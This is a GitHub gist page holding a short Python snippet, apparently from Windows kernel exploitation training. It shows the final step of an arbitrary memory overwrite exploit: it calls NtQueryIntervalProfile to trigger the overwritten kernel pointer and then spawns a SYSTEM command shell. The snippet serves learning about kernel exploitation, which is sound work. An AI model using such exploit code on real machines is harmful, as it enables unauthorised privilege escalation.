Skip to content

Instantly share code, notes, and snippets.

@hacksysteam

hacksysteam/kernel_aow.py

Created May 7, 2015 08:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hacksysteam/e3af9f2a1cef7bf528db to your computer and use it in GitHub Desktop.
Save hacksysteam/e3af9f2a1cef7bf528db to your computer and use it in GitHub Desktop.
Download ZIP
Exploit Snippet for Arbitrary Memory Overwrite in Windows Kernel
Raw
kernel_aow.py
out = c_ulong()
inp = 0x1337
hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
print("[+] Spawning SYSTEM Shell")
program_pid = subprocess.Popen("cmd.exe",
creationflags=subprocess.CREATE_NEW_CONSOLE,
close_fds=True).pid
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment